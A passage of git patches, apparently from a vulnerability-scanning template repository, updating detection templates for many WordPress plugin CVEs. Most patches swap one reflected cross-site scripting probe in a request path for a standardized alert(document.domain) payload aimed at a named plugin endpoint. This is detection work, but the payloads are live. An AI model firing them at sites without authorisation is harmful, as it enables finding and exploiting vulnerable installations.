'{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' @@ -21,7 +21,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 6cd08e6f41377c7c353fd2254440fb5f4f3aad6d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:01:40 +0530 Subject: [PATCH 0832/4083] Update CVE-2012-2371.yaml --- cves/2012/CVE-2012-2371.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml index 61a2207ec3..b41122ff02 100644 --- a/cves/2012/CVE-2012-2371.yaml +++ b/cves/2012/CVE-2012-2371.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E' + - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 70bd4c64ede79ce1d13cffec423768859d142c5b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:02:53 +0530 Subject: [PATCH 0833/4083] Update CVE-2012-4242.yaml --- cves/2012/CVE-2012-4242.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml index 791034edfe..d7ca7ac309 100644 --- a/cves/2012/CVE-2012-4242.yaml +++ b/cves/2012/CVE-2012-4242.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 0fb255a462e320de9476c71900ca028d7e90ad82 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:03:23 +0530 Subject: [PATCH 0834/4083] Update CVE-2012-4273.yaml --- cves/2012/CVE-2012-4273.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml index db31bfa338..99a6f52d88 100644 --- a/cves/2012/CVE-2012-4273.yaml +++ b/cves/2012/CVE-2012-4273.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 68e005d1a2ce521045be3e019d3e01e746231c6b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:03:46 +0530 Subject: [PATCH 0835/4083] Update CVE-2012-4768.yaml --- cves/2012/CVE-2012-4768.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml index e89963b08e..5c198776f4 100644 --- a/cves/2012/CVE-2012-4768.yaml +++ b/cves/2012/CVE-2012-4768.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 269d14b0bef33a5534308d47e6eb395104a1afd3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:03 +0530 Subject: [PATCH 0836/4083] Update CVE-2012-5913.yaml --- cves/2012/CVE-2012-5913.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml index be685d2507..cdbbce256d 100644 --- a/cves/2012/CVE-2012-5913.yaml +++ b/cves/2012/CVE-2012-5913.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E' + - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c8a1047ec1f2a21f0680fedd05647a2f6f9630e4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:25 +0530 Subject: [PATCH 0837/4083] Update CVE-2013-2287.yaml --- cves/2013/CVE-2013-2287.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml index 33a0b554e1..05ae7013e2 100644 --- a/cves/2013/CVE-2013-2287.yaml +++ b/cves/2013/CVE-2013-2287.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 62617288d0d8d644b4fdc9d94f397b7ec1d95b35 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:05:55 +0530 Subject: [PATCH 0838/4083] Update CVE-2013-4117.yaml --- cves/2013/CVE-2013-4117.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml index f30a61b264..2b2a102326 100644 --- a/cves/2013/CVE-2013-4117.yaml +++ b/cves/2013/CVE-2013-4117.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 47adcf182adebfc8f065fea2d384224b1c165c00 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:06:19 +0530 Subject: [PATCH 0839/4083] Update CVE-2013-4625.yaml --- cves/2013/CVE-2013-4625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml index 4b9f9136b6..e2184bc7a0 100644 --- a/cves/2013/CVE-2013-4625.yaml +++ b/cves/2013/CVE-2013-4625.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ac74c798801cd98960ac30e1a029e026634e2360 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:10:50 +0530 Subject: [PATCH 0840/4083] Update CVE-2014-4513.yaml --- cves/2014/CVE-2014-4513.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2014/CVE-2014-4513.yaml b/cves/2014/CVE-2014-4513.yaml index dfcae28193..2661d56866 100644 --- a/cves/2014/CVE-2014-4513.yaml +++ b/cves/2014/CVE-2014-4513.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e694c5ed4f49764d8f006c5d045c9dc13d659b8e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:11:14 +0530 Subject: [PATCH 0841/4083] Update CVE-2016-1000128.yaml --- cves/2016/CVE-2016-1000128.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml index 83fc34ed8d..b3dea4bf0d 100644 --- a/cves/2016/CVE-2016-1000128.yaml +++ b/cves/2016/CVE-2016-1000128.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From fbf13672bac3a27a131589f085d5dba9fe2c4d44 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:11:45 +0530 Subject: [PATCH 0842/4083] Update CVE-2016-1000129.yaml --- cves/2016/CVE-2016-1000129.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml index d76c910dcf..9b0f14449b 100644 --- a/cves/2016/CVE-2016-1000129.yaml +++ b/cves/2016/CVE-2016-1000129.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From ce8bab80f963c1f4cd7bb03ce0b8b189a749690a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:07 +0530 Subject: [PATCH 0843/4083] Update CVE-2016-1000130.yaml --- cves/2016/CVE-2016-1000130.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml index 36392e35d4..18141078b1 100644 --- a/cves/2016/CVE-2016-1000130.yaml +++ b/cves/2016/CVE-2016-1000130.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 62c3971816a3a0c856c5c8b22693338de71018e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:30 +0530 Subject: [PATCH 0844/4083] Update CVE-2016-1000131.yaml --- cves/2016/CVE-2016-1000131.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml index 1e540169b2..a9c8dcbf8d 100644 --- a/cves/2016/CVE-2016-1000131.yaml +++ b/cves/2016/CVE-2016-1000131.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 1790dd8fc268ef01693f49ec139c096319e11cde Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:12:58 +0530 Subject: [PATCH 0845/4083] Update CVE-2016-1000132.yaml --- cves/2016/CVE-2016-1000132.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml index e72ea63c7b..fa9404875a 100644 --- a/cves/2016/CVE-2016-1000132.yaml +++ b/cves/2016/CVE-2016-1000132.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&msg=imported" + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From d74ebd67d7b9dfad7f09a7acde68afc9ad87372a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:13:30 +0530 Subject: [PATCH 0846/4083] Update CVE-2016-1000133.yaml --- cves/2016/CVE-2016-1000133.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml index 658b8562e7..48e7531114 100644 --- a/cves/2016/CVE-2016-1000133.yaml +++ b/cves/2016/CVE-2016-1000133.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%22%20%3C%2Fscript%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C" + - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e6f51e19ebabcc2896a9e08562348b78c1c949e4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:13:59 +0530 Subject: [PATCH 0847/4083] Update CVE-2016-1000134.yaml --- cves/2016/CVE-2016-1000134.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml index 1f35214f3d..99d42687c9 100644 --- a/cves/2016/CVE-2016-1000134.yaml +++ b/cves/2016/CVE-2016-1000134.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From a81d23491b4f16b026d86a648e567639ec8624b1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:14:30 +0530 Subject: [PATCH 0848/4083] Update CVE-2016-1000135.yaml --- cves/2016/CVE-2016-1000135.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml index ba16e3c957..48480b29c5 100644 --- a/cves/2016/CVE-2016-1000135.yaml +++ b/cves/2016/CVE-2016-1000135.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From b47cf72dd00e864e5a91ef90cb8311ac71db916e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:15:08 +0530 Subject: [PATCH 0849/4083] Update CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 3d321b4c8f..8dab040905 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From df69924f5b3bf1865433434fa7fcef0fc8c1e664 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:15:37 +0530 Subject: [PATCH 0850/4083] Update CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index ecf71fafc7..9bc3b473c3 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -13,7 +13,7 @@ info: requests: - method: POST path: - - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1" body: "amty_hidden=1" @@ -21,7 +21,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 63765c5693a777bd2aa30ff79ebfee5878b3b39d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:29:23 +0530 Subject: [PATCH 0851/4083] Update CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 40a4e59745..9a2c3bce2f 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: word words: - - "" + - "" part: body - type: word From 70b1ba08d62e8729f132b3c9ea0a918464d13be6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:29:58 +0530 Subject: [PATCH 0852/4083] Update CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 5ac65f849b..7bed4c11c3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From cfd72afbc546fb9792cc2d0da3a8a5111343e007 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:30:44 +0530 Subject: [PATCH 0853/4083] Update CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 19bdc03839..da92a85868 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 1453b08a1d1d620d551fb06db34ac27eab24901e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:31:16 +0530 Subject: [PATCH 0854/4083] Update CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index 4f305a6330..b71a5826b6 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5923b1522e3463c27b0119b3cdb6b12edef3b56e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:31:57 +0530 Subject: [PATCH 0855/4083] Update CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index 79a0cbd39f..a7af37791e 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' + - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From fee3b0dbba129ef0fc067263b110e7ae6143a193 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:32:30 +0530 Subject: [PATCH 0856/4083] Update CVE-2018-5316.yaml --- cves/2018/CVE-2018-5316.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml index 7553a25625..13f88cb96b 100644 --- a/cves/2018/CVE-2018-5316.yaml +++ b/cves/2018/CVE-2018-5316.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From bf0aff757989eb310e4052a2a3e608ce3fe7c870 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:32:53 +0530 Subject: [PATCH 0857/4083] Update CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 55c9e48f5d..311cc6e005 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -13,13 +13,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E' + - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5b1766e10b21e08cae7393c03372a28d2c8aaf7e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:33:40 +0530 Subject: [PATCH 0858/4083] Update CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index f067dd1e34..7a1a0b7835 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 5dce5e078e2897dae1dbe7d687511afe5116d820 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 19 Jul 2021 11:34:07 +0530 Subject: [PATCH 0859/4083] Update CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index 3ff0907f88..c2ccc90357 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E%3C%2Fpath%3E' + - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 